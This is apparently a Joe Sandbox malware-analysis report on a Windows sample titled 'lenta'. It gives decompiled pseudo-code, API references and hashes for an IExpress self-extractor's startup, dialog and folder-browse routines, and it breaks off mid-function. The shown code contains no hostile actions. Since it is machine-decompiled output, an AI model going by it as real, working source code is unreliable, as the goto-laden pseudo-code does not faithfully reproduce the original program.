                                                                      0x011d32c8
                                                                      0x011d32ce
                                                                      0x00000000
                                                                      0x011d32ce
                                                                      0x011d3251
                                                                      0x011d3256
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3271
                                                                      0x011d3277
                                                                      0x011d3279
                                                                      0x011d3298
                                                                      0x011d329d
                                                                      0x011d329f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d32b0
                                                                      0x011d32b6
                                                                      0x011d32b8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d32be
                                                                      0x011d3280
                                                                      0x011d3289
                                                                      0x011d328e
                                                                      0x00000000
                                                                      0x011d328e
                                                                      0x011d327b
                                                                      0x00000000
                                                                      0x011d327b
                                                                      0x00000000

                                                                      APIs
                                                                      • LoadStringA.USER32(000003E8,011D8598,00000200), ref: 011D3271
                                                                      • GetDesktopWindow.USER32 ref: 011D33E2
                                                                      • SetWindowTextA.USER32(?,lenta), ref: 011D33F7
                                                                      • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 011D3410
                                                                      • GetDlgItem.USER32(?,00000836), ref: 011D3426
                                                                      • EnableWindow.USER32(00000000), ref: 011D342D
                                                                      • EndDialog.USER32(?,00000000), ref: 011D343F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$lenta
                                                                      • API String ID: 2418873061-406680565
                                                                      • Opcode ID: 263c51c6c417ba7b9ff090e3c079833ea996e11d0655c859d879d452511def96
                                                                      • Instruction ID: 1a96b866bd6e13f793ac599e087216de900bb45378162114c21b08e29099e008
                                                                      • Opcode Fuzzy Hash: 263c51c6c417ba7b9ff090e3c079833ea996e11d0655c859d879d452511def96
                                                                      • Instruction Fuzzy Hash: 3B5127B039725176EB3E5A796C8CF7B2E59BF46B58F004038F265965C5CFA88441C363
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E011D2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t13;
                                                                      				void* _t20;
                                                                      				void* _t23;
                                                                      				void* _t27;
                                                                      				struct HRSRC__* _t31;
                                                                      				intOrPtr _t33;
                                                                      				void* _t43;
                                                                      				void* _t48;
                                                                      				signed int _t65;
                                                                      				struct HINSTANCE__* _t66;
                                                                      				signed int _t67;
                                                                      
                                                                      				_t13 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t13 ^ _t67;
                                                                      				_t65 = 0;
                                                                      				_t66 = __ecx;
                                                                      				_t48 = __edx;
                                                                      				 *0x11d9a3c = __ecx;
                                                                      				memset(0x11d9140, 0, 0x8fc);
                                                                      				memset(0x11d8a20, 0, 0x32c);
                                                                      				memset(0x11d88c0, 0, 0x104);
                                                                      				 *0x11d93ec = 1;
                                                                      				_t20 = E011D468F("TITLE", 0x11d9154, 0x7f);
                                                                      				if(_t20 == 0 || _t20 > 0x80) {
                                                                      					_t64 = 0x4b1;
                                                                      					goto L32;
                                                                      				} else {
                                                                      					_t27 = CreateEventA(0, 1, 1, 0);
                                                                      					 *0x11d858c = _t27;
                                                                      					SetEvent(_t27);
                                                                      					_t64 = 0x11d9a34;
                                                                      					if(E011D468F("EXTRACTOPT", 0x11d9a34, 4) != 0) {
                                                                      						if(( *0x11d9a34 & 0x000000c0) == 0) {
                                                                      							L12:
                                                                      							 *0x11d9120 =  *0x11d9120 & _t65;
                                                                      							if(E011D5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                      								if( *0x11d8a3a == 0) {
                                                                      									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                      									if(_t31 != 0) {
                                                                      										_t65 = LoadResource(_t66, _t31);
                                                                      									}
                                                                      									if( *0x11d8184 != 0) {
                                                                      										__imp__#17();
                                                                      									}
                                                                      									if( *0x11d8a24 == 0) {
                                                                      										_t57 = _t65;
                                                                      										if(E011D36EE(_t65) == 0) {
                                                                      											goto L33;
                                                                      										} else {
                                                                      											_t33 =  *0x11d9a40; // 0x3
                                                                      											_t48 = 1;
                                                                      											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                      												if(( *0x11d9a34 & 0x00000100) == 0 || ( *0x11d8a38 & 0x00000001) != 0 || E011D18A3(_t64, _t66) != 0) {
                                                                      													goto L30;
                                                                      												} else {
                                                                      													_t64 = 0x7d6;
                                                                      													if(E011D6517(_t57, 0x7d6, _t34, E011D19E0, 0x547, 0x83e) != 0x83d) {
                                                                      														goto L33;
                                                                      													} else {
                                                                      														goto L30;
                                                                      													}
                                                                      												}
                                                                      											} else {
                                                                      												L30:
                                                                      												_t23 = _t48;
                                                                      											}
                                                                      										}
                                                                      									} else {
                                                                      										_t23 = 1;
                                                                      									}
                                                                      								} else {
                                                                      									E011D2390(0x11d8a3a);
                                                                      									goto L33;
                                                                      								}
                                                                      							} else {
                                                                      								_t64 = 0x520;
                                                                      								L32:
                                                                      								E011D44B9(0, _t64, 0, 0, 0x10, 0);
                                                                      								goto L33;
                                                                      							}
                                                                      						} else {
                                                                      							_t64 =  &_v268;
                                                                      							if(E011D468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                      								goto L3;
                                                                      							} else {
                                                                      								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                      								 *0x11d8588 = _t43;
                                                                      								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                      									goto L12;
                                                                      								} else {
                                                                      									if(( *0x11d9a34 & 0x00000080) == 0) {
                                                                      										_t64 = 0x524;
                                                                      										if(E011D44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                      											goto L12;
                                                                      										} else {
                                                                      											goto L11;
                                                                      										}
                                                                      									} else {
                                                                      										_t64 = 0x54b;
                                                                      										E011D44B9(0, 0x54b, "lenta", 0, 0x10, 0);
                                                                      										L11:
                                                                      										CloseHandle( *0x11d8588);
                                                                      										 *0x11d9124 = 0x800700b7;
                                                                      										goto L33;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						L3:
                                                                      						_t64 = 0x4b1;
                                                                      						E011D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                      						 *0x11d9124 = 0x80070714;
                                                                      						L33:
                                                                      						_t23 = 0;
                                                                      					}
                                                                      				}
                                                                      				return E011D6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                      			}



















                                                                      0x011d2cb5
                                                                      0x011d2cbc
                                                                      0x011d2cc7
                                                                      0x011d2cc9
                                                                      0x011d2cd1
                                                                      0x011d2cd3
                                                                      0x011d2cd9
                                                                      0x011d2ce9
                                                                      0x011d2cf9
                                                                      0x011d2d0e
                                                                      0x011d2d15
                                                                      0x011d2d1c
                                                                      0x011d2ef3
                                                                      0x00000000
                                                                      0x011d2d2d
                                                                      0x011d2d34
                                                                      0x011d2d3b
                                                                      0x011d2d40
                                                                      0x011d2d48
                                                                      0x011d2d59
                                                                      0x011d2d84
                                                                      0x011d2e1f
                                                                      0x011d2e1f
                                                                      0x011d2e2e
                                                                      0x011d2e41
                                                                      0x011d2e5a
                                                                      0x011d2e62
                                                                      0x011d2e6c
                                                                      0x011d2e6c
                                                                      0x011d2e75
                                                                      0x011d2e77
                                                                      0x011d2e77
                                                                      0x011d2e84
                                                                      0x011d2e8b
                                                                      0x011d2e94
                                                                      0x00000000
                                                                      0x011d2e96
                                                                      0x011d2e96
                                                                      0x011d2e9e
                                                                      0x011d2ea2
                                                                      0x011d2eba
                                                                      0x00000000
                                                                      0x011d2ece
                                                                      0x011d2ede
                                                                      0x011d2eed
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d2eed
                                                                      0x011d2eef
                                                                      0x011d2eef
                                                                      0x011d2eef
                                                                      0x011d2eef
                                                                      0x011d2ea2
                                                                      0x011d2e86
                                                                      0x011d2e88
                                                                      0x011d2e88
                                                                      0x011d2e43
                                                                      0x011d2e48
                                                                      0x00000000
                                                                      0x011d2e48
                                                                      0x011d2e30
                                                                      0x011d2e30
                                                                      0x011d2ef8
                                                                      0x011d2f01
                                                                      0x00000000
                                                                      0x011d2f01
                                                                      0x011d2d8a
                                                                      0x011d2d8f
                                                                      0x011d2da1
                                                                      0x00000000
                                                                      0x011d2da3
                                                                      0x011d2dae
                                                                      0x011d2db4
                                                                      0x011d2dbb
                                                                      0x00000000
                                                                      0x011d2dca
                                                                      0x011d2dd3
                                                                      0x011d2df5
                                                                      0x011d2e02
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d2dd5
                                                                      0x011d2dde
                                                                      0x011d2de3
                                                                      0x011d2e04
                                                                      0x011d2e0a
                                                                      0x011d2e10
                                                                      0x00000000
                                                                      0x011d2e10
                                                                      0x011d2dd3
                                                                      0x011d2dbb
                                                                      0x011d2da1
                                                                      0x011d2d5b
                                                                      0x011d2d5b
                                                                      0x011d2d5d
                                                                      0x011d2d69
                                                                      0x011d2d6e
                                                                      0x011d2f06
                                                                      0x011d2f06
                                                                      0x011d2f06
                                                                      0x011d2d59
                                                                      0x011d2f18

                                                                      APIs
                                                                      • memset.MSVCRT ref: 011D2CD9
                                                                      • memset.MSVCRT ref: 011D2CE9
                                                                      • memset.MSVCRT ref: 011D2CF9
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46A0
                                                                        • Part of subcall function 011D468F: SizeofResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46A9
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46C3
                                                                        • Part of subcall function 011D468F: LoadResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46CC
                                                                        • Part of subcall function 011D468F: LockResource.KERNEL32(00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46D3
                                                                        • Part of subcall function 011D468F: memcpy_s.MSVCRT ref: 011D46E5
                                                                        • Part of subcall function 011D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46EF
                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D2D34
                                                                      • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 011D2D40
                                                                      • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 011D2DAE
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 011D2DBD
                                                                      • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 011D2E0A
                                                                        • Part of subcall function 011D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 011D4518
                                                                        • Part of subcall function 011D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 011D4554
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                      • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                      • API String ID: 1002816675-2993962200
                                                                      • Opcode ID: 763c5419a26a31c3793e5426fb41e8b584b93378b70135b5d779d6c8a9b3c450
                                                                      • Instruction ID: 919b222afe4421e85f969451abf0c506e1660a75f83e33b3caa798e0c1207a3f
                                                                      • Opcode Fuzzy Hash: 763c5419a26a31c3793e5426fb41e8b584b93378b70135b5d779d6c8a9b3c450
                                                                      • Instruction Fuzzy Hash: 36514B703423266BF73CA679DD4AB7B3698EB45708F044039EA71D65C8DBB888C1C722
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 81%
                                                                      			E011D34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                      				void* _t9;
                                                                      				void* _t12;
                                                                      				void* _t13;
                                                                      				void* _t17;
                                                                      				void* _t23;
                                                                      				void* _t25;
                                                                      				struct HWND__* _t35;
                                                                      				struct HWND__* _t38;
                                                                      				void* _t39;
                                                                      
                                                                      				_t9 = _a8 - 0x10;
                                                                      				if(_t9 == 0) {
                                                                      					__eflags = 1;
                                                                      					L19:
                                                                      					_push(0);
                                                                      					 *0x11d91d8 = 1;
                                                                      					L20:
                                                                      					_push(_a4);
                                                                      					L21:
                                                                      					EndDialog();
                                                                      					L22:
                                                                      					return 1;
                                                                      				}
                                                                      				_push(1);
                                                                      				_pop(1);
                                                                      				_t12 = _t9 - 0xf2;
                                                                      				if(_t12 == 0) {
                                                                      					__eflags = _a12 - 0x1b;
                                                                      					if(_a12 != 0x1b) {
                                                                      						goto L22;
                                                                      					}
                                                                      					goto L19;
                                                                      				}
                                                                      				_t13 = _t12 - 0xe;
                                                                      				if(_t13 == 0) {
                                                                      					_t35 = _a4;
                                                                      					 *0x11d8584 = _t35;
                                                                      					E011D43D0(_t35, GetDesktopWindow());
                                                                      					__eflags =  *0x11d8184; // 0x1
                                                                      					if(__eflags != 0) {
                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                      					}
                                                                      					SetWindowTextA(_t35, "lenta");
                                                                      					_t17 = CreateThread(0, 0, E011D4FE0, 0, 0, 0x11d8798);
                                                                      					 *0x11d879c = _t17;
                                                                      					__eflags = _t17;
                                                                      					if(_t17 != 0) {
                                                                      						goto L22;
                                                                      					} else {
                                                                      						E011D44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                      						_push(0);
                                                                      						_push(_t35);
                                                                      						goto L21;
                                                                      					}
                                                                      				}
                                                                      				_t23 = _t13 - 1;
                                                                      				if(_t23 == 0) {
                                                                      					__eflags = _a12 - 2;
                                                                      					if(_a12 != 2) {
                                                                      						goto L22;
                                                                      					}
                                                                      					ResetEvent( *0x11d858c);
                                                                      					_t38 =  *0x11d8584; // 0x0
                                                                      					_t25 = E011D44B9(_t38, 0x4b2, 0x11d1140, 0, 0x20, 4);
                                                                      					__eflags = _t25 - 6;
                                                                      					if(_t25 == 6) {
                                                                      						L11:
                                                                      						 *0x11d91d8 = 1;
                                                                      						SetEvent( *0x11d858c);
                                                                      						_t39 =  *0x11d879c; // 0x0
                                                                      						E011D3680(_t39);
                                                                      						_push(0);
                                                                      						goto L20;
                                                                      					}
                                                                      					__eflags = _t25 - 1;
                                                                      					if(_t25 == 1) {
                                                                      						goto L11;
                                                                      					}
                                                                      					SetEvent( *0x11d858c);
                                                                      					goto L22;
                                                                      				}
                                                                      				if(_t23 == 0xe90) {
                                                                      					TerminateThread( *0x11d879c, 0);
                                                                      					EndDialog(_a4, _a12);
                                                                      					return 1;
                                                                      				}
                                                                      				return 0;
                                                                      			}












                                                                      0x011d34fb
                                                                      0x011d34fe
                                                                      0x011d3665
                                                                      0x011d3666
                                                                      0x011d3666
                                                                      0x011d3668
                                                                      0x011d366e
                                                                      0x011d366e
                                                                      0x011d3671
                                                                      0x011d3671
                                                                      0x011d3677
                                                                      0x00000000
                                                                      0x011d3677
                                                                      0x011d3504
                                                                      0x011d3506
                                                                      0x011d3507
                                                                      0x011d350c
                                                                      0x011d365b
                                                                      0x011d365f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3661
                                                                      0x011d3512
                                                                      0x011d3515
                                                                      0x011d35be
                                                                      0x011d35c1
                                                                      0x011d35d1
                                                                      0x011d35d8
                                                                      0x011d35de
                                                                      0x011d35f8
                                                                      0x011d3617
                                                                      0x011d3617
                                                                      0x011d3623
                                                                      0x011d3637
                                                                      0x011d363d
                                                                      0x011d3642
                                                                      0x011d3644
                                                                      0x00000000
                                                                      0x011d3646
                                                                      0x011d3652
                                                                      0x011d3657
                                                                      0x011d3658
                                                                      0x00000000
                                                                      0x011d3658
                                                                      0x011d3644
                                                                      0x011d351b
                                                                      0x011d351d
                                                                      0x011d354f
                                                                      0x011d3553
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d355f
                                                                      0x011d3565
                                                                      0x011d357c
                                                                      0x011d3581
                                                                      0x011d3584
                                                                      0x011d359b
                                                                      0x011d35a1
                                                                      0x011d35a7
                                                                      0x011d35ad
                                                                      0x011d35b3
                                                                      0x011d35b8
                                                                      0x00000000
                                                                      0x011d35b8
                                                                      0x011d3586
                                                                      0x011d3588
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3590
                                                                      0x00000000
                                                                      0x011d3590
                                                                      0x011d3524
                                                                      0x011d3535
                                                                      0x011d3541
                                                                      0x00000000
                                                                      0x011d3549
                                                                      0x00000000

                                                                      APIs
                                                                      • TerminateThread.KERNEL32(00000000), ref: 011D3535
                                                                      • EndDialog.USER32(?,?), ref: 011D3541
                                                                      • ResetEvent.KERNEL32 ref: 011D355F
                                                                      • SetEvent.KERNEL32(011D1140,00000000,00000020,00000004), ref: 011D3590
                                                                      • GetDesktopWindow.USER32 ref: 011D35C7
                                                                      • GetDlgItem.USER32(?,0000083B), ref: 011D35F1
                                                                      • SendMessageA.USER32(00000000), ref: 011D35F8
                                                                      • GetDlgItem.USER32(?,0000083B), ref: 011D3610
                                                                      • SendMessageA.USER32(00000000), ref: 011D3617
                                                                      • SetWindowTextA.USER32(?,lenta), ref: 011D3623
                                                                      • CreateThread.KERNEL32 ref: 011D3637
                                                                      • EndDialog.USER32(?,00000000), ref: 011D3671
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                      • String ID: lenta
                                                                      • API String ID: 2406144884-2780258678
                                                                      • Opcode ID: be46e9d7f2010aae31fbc29aa6b9e025b5c7081866153d2f275fa69abc59e678
                                                                      • Instruction ID: 95fbddd2100d177d16b56088f4ed7f10f27dfab740def00808956f00f8458985
                                                                      • Opcode Fuzzy Hash: be46e9d7f2010aae31fbc29aa6b9e025b5c7081866153d2f275fa69abc59e678
                                                                      • Instruction Fuzzy Hash: E931C0B0253211BBDB3D5B39EC4CE2A3E69FB85B40F444539F63292698CB758580CB56
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 50%
                                                                      			E011D4224(char __ecx) {
                                                                      				char* _v8;
                                                                      				_Unknown_base(*)()* _v12;
                                                                      				_Unknown_base(*)()* _v16;
                                                                      				_Unknown_base(*)()* _v20;
                                                                      				char* _v28;
                                                                      				intOrPtr _v32;
                                                                      				intOrPtr _v36;
                                                                      				intOrPtr _v40;
                                                                      				char _v44;
                                                                      				char _v48;
                                                                      				char _v52;
                                                                      				_Unknown_base(*)()* _t26;
                                                                      				_Unknown_base(*)()* _t28;
                                                                      				_Unknown_base(*)()* _t29;
                                                                      				_Unknown_base(*)()* _t32;
                                                                      				char _t42;
                                                                      				char* _t44;
                                                                      				char* _t61;
                                                                      				void* _t63;
                                                                      				char* _t65;
                                                                      				struct HINSTANCE__* _t66;
                                                                      				char _t67;
                                                                      				void* _t71;
                                                                      				char _t76;
                                                                      				intOrPtr _t85;
                                                                      
                                                                      				_t67 = __ecx;
                                                                      				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                      				if(_t66 == 0) {
                                                                      					_t63 = 0x4c2;
                                                                      					L22:
                                                                      					E011D44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                      					return 0;
                                                                      				}
                                                                      				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                      				_v12 = _t26;
                                                                      				if(_t26 == 0) {
                                                                      					L20:
                                                                      					FreeLibrary(_t66);
                                                                      					_t63 = 0x4c1;
                                                                      					goto L22;
                                                                      				}
                                                                      				_t28 = GetProcAddress(_t66, 0xc3);
                                                                      				_v20 = _t28;
                                                                      				if(_t28 == 0) {
                                                                      					goto L20;
                                                                      				}
                                                                      				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                      				_v16 = _t29;
                                                                      				if(_t29 == 0) {
                                                                      					goto L20;
                                                                      				}
                                                                      				_t76 =  *0x11d88c0; // 0x0
                                                                      				if(_t76 != 0) {
                                                                      					L10:
                                                                      					 *0x11d87a0 = 0;
                                                                      					_v52 = _t67;
                                                                      					_v48 = 0;
                                                                      					_v44 = 0;
                                                                      					_v40 = 0x11d8598;
                                                                      					_v36 = 1;
                                                                      					_v32 = E011D4200;
                                                                      					_v28 = 0x11d88c0;
                                                                      					 *0x11da288( &_v52);
                                                                      					_t32 =  *_v12();
                                                                      					if(_t71 != _t71) {
                                                                      						asm("int 0x29");
                                                                      					}
                                                                      					_v12 = _t32;
                                                                      					if(_t32 != 0) {
                                                                      						 *0x11da288(_t32, 0x11d88c0);
                                                                      						 *_v16();
                                                                      						if(_t71 != _t71) {
                                                                      							asm("int 0x29");
                                                                      						}
                                                                      						if( *0x11d88c0 != 0) {
                                                                      							E011D1680(0x11d87a0, 0x104, 0x11d88c0);
                                                                      						}
                                                                      						 *0x11da288(_v12);
                                                                      						 *_v20();
                                                                      						if(_t71 != _t71) {
                                                                      							asm("int 0x29");
                                                                      						}
                                                                      					}
                                                                      					FreeLibrary(_t66);
                                                                      					_t85 =  *0x11d87a0; // 0x0
                                                                      					return 0 | _t85 != 0x00000000;
                                                                      				} else {
                                                                      					GetTempPathA(0x104, 0x11d88c0);
                                                                      					_t61 = 0x11d88c0;
                                                                      					_t4 =  &(_t61[1]); // 0x11d88c1
                                                                      					_t65 = _t4;
                                                                      					do {
                                                                      						_t42 =  *_t61;
                                                                      						_t61 =  &(_t61[1]);
                                                                      					} while (_t42 != 0);
                                                                      					_t5 = _t61 - _t65 + 0x11d88c0; // 0x23b1181
                                                                      					_t44 = CharPrevA(0x11d88c0, _t5);
                                                                      					_v8 = _t44;
                                                                      					if( *_t44 == 0x5c &&  *(CharPrevA(0x11d88c0, _t44)) != 0x3a) {
                                                                      						 *_v8 = 0;
                                                                      					}
                                                                      					goto L10;
                                                                      				}
                                                                      			}




























                                                                      0x011d4234
                                                                      0x011d423c
                                                                      0x011d4240
                                                                      0x011d43b2
                                                                      0x011d43b7
                                                                      0x011d43c0
                                                                      0x00000000
                                                                      0x011d43c5
                                                                      0x011d424c
                                                                      0x011d4252
                                                                      0x011d4257
                                                                      0x011d43a4
                                                                      0x011d43a5
                                                                      0x011d43ab
                                                                      0x00000000
                                                                      0x011d43ab
                                                                      0x011d4263
                                                                      0x011d4269
                                                                      0x011d426e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d427a
                                                                      0x011d4280
                                                                      0x011d4285
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d428d
                                                                      0x011d4293
                                                                      0x011d42e6
                                                                      0x011d42e9
                                                                      0x011d42ef
                                                                      0x011d42f4
                                                                      0x011d42f7
                                                                      0x011d4300
                                                                      0x011d4307
                                                                      0x011d430e
                                                                      0x011d4315
                                                                      0x011d431c
                                                                      0x011d4322
                                                                      0x011d4326
                                                                      0x011d432d
                                                                      0x011d432d
                                                                      0x011d432f
                                                                      0x011d4334
                                                                      0x011d4343
                                                                      0x011d4349
                                                                      0x011d434d
                                                                      0x011d4354
                                                                      0x011d4354
                                                                      0x011d435d
                                                                      0x011d436e
                                                                      0x011d436e
                                                                      0x011d437d
                                                                      0x011d4383
                                                                      0x011d4387
                                                                      0x011d438e
                                                                      0x011d438e
                                                                      0x011d4387
                                                                      0x011d4391
                                                                      0x011d4399
                                                                      0x00000000
                                                                      0x011d4295
                                                                      0x011d429f
                                                                      0x011d42a5
                                                                      0x011d42aa
                                                                      0x011d42aa
                                                                      0x011d42ad
                                                                      0x011d42ad
                                                                      0x011d42af
                                                                      0x011d42b0
                                                                      0x011d42b6
                                                                      0x011d42c2
                                                                      0x011d42c8
                                                                      0x011d42ce
                                                                      0x011d42e4
                                                                      0x011d42e4
                                                                      0x00000000
                                                                      0x011d42ce

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 011D4236
                                                                      • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 011D424C
                                                                      • GetProcAddress.KERNEL32(00000000,000000C3), ref: 011D4263
                                                                      • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 011D427A
                                                                      • GetTempPathA.KERNEL32(00000104,011D88C0,?,00000001), ref: 011D429F
                                                                      • CharPrevA.USER32(011D88C0,023B1181,?,00000001), ref: 011D42C2
                                                                      • CharPrevA.USER32(011D88C0,00000000,?,00000001), ref: 011D42D6
                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 011D4391
                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 011D43A5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                      • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                      • API String ID: 1865808269-1731843650
                                                                      • Opcode ID: cf741efafa220a20f0bfd6ff849449ed6f48c3a4c82677cabff2775194c15b7b
                                                                      • Instruction ID: a4cc3069a3efe46106ba29fb51848a40e85b8db05d7a603b48b2b48096cf00a3
                                                                      • Opcode Fuzzy Hash: cf741efafa220a20f0bfd6ff849449ed6f48c3a4c82677cabff2775194c15b7b
                                                                      • Instruction Fuzzy Hash: 23412874A02254BFE72DAF79F885A6E7FB4EF45344F044179EA51A3A45CB348841C760
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E011D44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                      				signed int _v8;
                                                                      				char _v64;
                                                                      				char _v576;
                                                                      				void* _v580;
                                                                      				struct HWND__* _v584;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t34;
                                                                      				void* _t37;
                                                                      				signed int _t39;
                                                                      				intOrPtr _t43;
                                                                      				signed int _t44;
                                                                      				signed int _t49;
                                                                      				signed int _t52;
                                                                      				void* _t54;
                                                                      				intOrPtr _t55;
                                                                      				intOrPtr _t58;
                                                                      				intOrPtr _t59;
                                                                      				int _t64;
                                                                      				void* _t66;
                                                                      				intOrPtr* _t67;
                                                                      				signed int _t69;
                                                                      				intOrPtr* _t73;
                                                                      				intOrPtr* _t76;
                                                                      				intOrPtr* _t77;
